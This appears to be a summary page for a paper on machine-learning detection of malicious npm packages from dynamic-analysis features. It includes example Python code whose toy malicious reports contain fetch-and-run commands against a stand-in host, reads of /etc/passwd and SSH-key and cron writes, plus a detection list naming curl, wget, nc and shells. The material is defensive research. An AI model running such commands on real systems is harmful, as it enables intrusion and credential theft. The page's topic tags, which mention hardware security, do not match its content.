Towards Classifying Benign And Malicious Packages Using Machine Learning
Thanh-Cong Nguyen, Ngoc-Thanh Nguyen, Van-Giau Ung, Duc-Ly Vu

TL;DR
This paper presents a machine-learning method that classifies open-source packages as benign or malicious from their runtime behavior, reaching an AUC of 0.91 on npm packages.
Contribution
The paper introduces an approach that extracts features from dynamic analysis (e.g., executed commands) and feeds them to machine learning models to detect malicious packages automatically.
Findings
The classifier reaches an AUC of 0.91 on npm packages.
The false positive rate is nearly 0%.
Features from dynamic analysis separate benign packages from malicious ones effectively.
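To make the two reported metrics concrete, the sketch below computes AUC and false positive rate in plain Python. The labels and scores are made up for illustration and are not the paper's data. The function names `roc_auc` and `false_positive_rate` and the 0.7 threshold are assumptions of this example.

```python
def roc_auc(labels, scores):
    """AUC as the probability that a random malicious sample
    outscores a random benign one (ties count as half a win)."""
    pos = [s for y, s in zip(labels, scores) if y == 1]
    neg = [s for y, s in zip(labels, scores) if y == 0]
    if not pos or not neg:
        raise ValueError("need at least one sample of each class")
    wins = 0.0
    for p in pos:
        for n in neg:
            if p > n:
                wins += 1.0
            elif p == n:
                wins += 0.5
    return wins / (len(pos) * len(neg))


def false_positive_rate(labels, scores, threshold):
    """Share of benign samples (label 0) scored at or above the threshold."""
    neg = [s for y, s in zip(labels, scores) if y == 0]
    if not neg:
        raise ValueError("need at least one benign sample")
    flagged = sum(1 for s in neg if s >= threshold)
    return flagged / len(neg)


# Illustrative data only: 1 = malicious, 0 = benign.
labels = [1, 1, 1, 0, 0, 0, 0]
scores = [0.95, 0.80, 0.40, 0.60, 0.30, 0.20, 0.10]

print("AUC:", roc_auc(labels, scores))
print("FPR at 0.7:", false_positive_rate(labels, scores, 0.7))
```

AUC summarizes ranking quality across all thresholds, while the false positive rate depends on the single threshold chosen for deployment, so a detector can report both a sub-1.0 AUC and a near-zero false positive rate at a strict threshold.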
Abstract
Recently, the number of malicious open-source packages in package repositories has been increasing dramatically. While major security scanners focus on identifying known Common Vulnerabilities and Exposures (CVEs) in open-source packages, there are very few studies on detecting malicious packages. Malicious open-source package detection typically requires static analysis, dynamic analysis, or both. Dynamic analysis is more effective as it can expose a package's behaviors at runtime. However, current dynamic analysis tools (e.g., ossf's package-analysis) lack an automatic method to differentiate malicious packages from benign packages. In this paper, we propose an approach to extract the features from dynamic analysis (e.g., executed commands) and leverage machine learning techniques to automatically classify packages as benign or malicious. Our evaluation of nearly 2000 packages on npm shows…
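The pipeline the abstract describes (dynamic-analysis output, then features, then a classifier) can be sketched roughly as follows. Everything specific here is an assumption made for illustration: the report keys (`commands`, `dns`, `files_written`) are a hypothetical schema and not the actual output format of package-analysis, the feature set and the `SUSPICIOUS_TOOLS` list are invented, and logistic regression is swapped in because the abstract does not name the model used.

```python
import math

# Hypothetical list of tools often seen in install-time droppers (assumption).
SUSPICIOUS_TOOLS = ("curl", "wget", "nc", "bash", "sh")


def extract_features(report):
    """Turn one (hypothetical) dynamic-analysis report into a numeric vector."""
    commands = report.get("commands", [])
    domains = report.get("dns", [])
    files = report.get("files_written", [])
    suspicious = 0
    for cmd in commands:
        parts = cmd.split()
        if parts and parts[0] in SUSPICIOUS_TOOLS:
            suspicious += 1
    sensitive = sum(1 for f in files if f.startswith("/etc/") or "/.ssh/" in f)
    return [float(len(commands)), float(suspicious),
            float(len(set(domains))), float(sensitive)]


def sigmoid(z):
    """Numerically stable logistic function."""
    if z >= 0:
        return 1.0 / (1.0 + math.exp(-z))
    e = math.exp(z)
    return e / (1.0 + e)


def train_logistic(X, y, lr=0.1, epochs=500):
    """Plain stochastic gradient descent on the logistic loss."""
    w = [0.0] * len(X[0])
    b = 0.0
    for _ in range(epochs):
        for xi, yi in zip(X, y):
            p = sigmoid(b + sum(wj * xj for wj, xj in zip(w, xi)))
            g = p - yi  # gradient of the loss with respect to the logit
            w = [wj - lr * g * xj for wj, xj in zip(w, xi)]
            b -= lr * g
    return w, b


def score(model, report):
    """Estimated probability that the package behind `report` is malicious."""
    w, b = model
    x = extract_features(report)
    return sigmoid(b + sum(wj * xj for wj, xj in zip(w, x)))


# Toy training set, invented for this sketch: (report, label), 1 = malicious.
train = [
    ({"commands": ["node index.js"], "dns": ["registry.npmjs.org"],
      "files_written": []}, 0),
    ({"commands": ["curl http://example.invalid/x.sh", "sh x.sh"],
      "dns": ["example.invalid"],
      "files_written": ["/home/user/.ssh/authorized_keys"]}, 1),
    ({"commands": ["node-gyp rebuild", "node install.js"],
      "dns": ["registry.npmjs.org"],
      "files_written": ["build/Release/addon.node"]}, 0),
    ({"commands": ["bash -c 'cat /etc/passwd'"],
      "dns": ["example.invalid", "registry.npmjs.org"],
      "files_written": []}, 1),
]
model = train_logistic([extract_features(r) for r, _ in train],
                       [label for _, label in train])

benign_report = {"commands": ["node scripts/postinstall.js"],
                 "dns": ["registry.npmjs.org"], "files_written": []}
malicious_report = {"commands": ["wget http://example.invalid/p", "sh p"],
                    "dns": ["example.invalid"],
                    "files_written": ["/etc/cron.d/job"]}
print("benign score:", score(model, benign_report))
print("malicious score:", score(model, malicious_report))
```

A real system would need far more training data and a richer feature set than this four-sample toy. The sketch only shows how runtime observations can become inputs to an ordinary supervised classifier.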
Taxonomy
Topics: Physical Unclonable Functions (PUFs) and Hardware Security · Advanced Malware Detection Techniques · Security and Verification in Computing
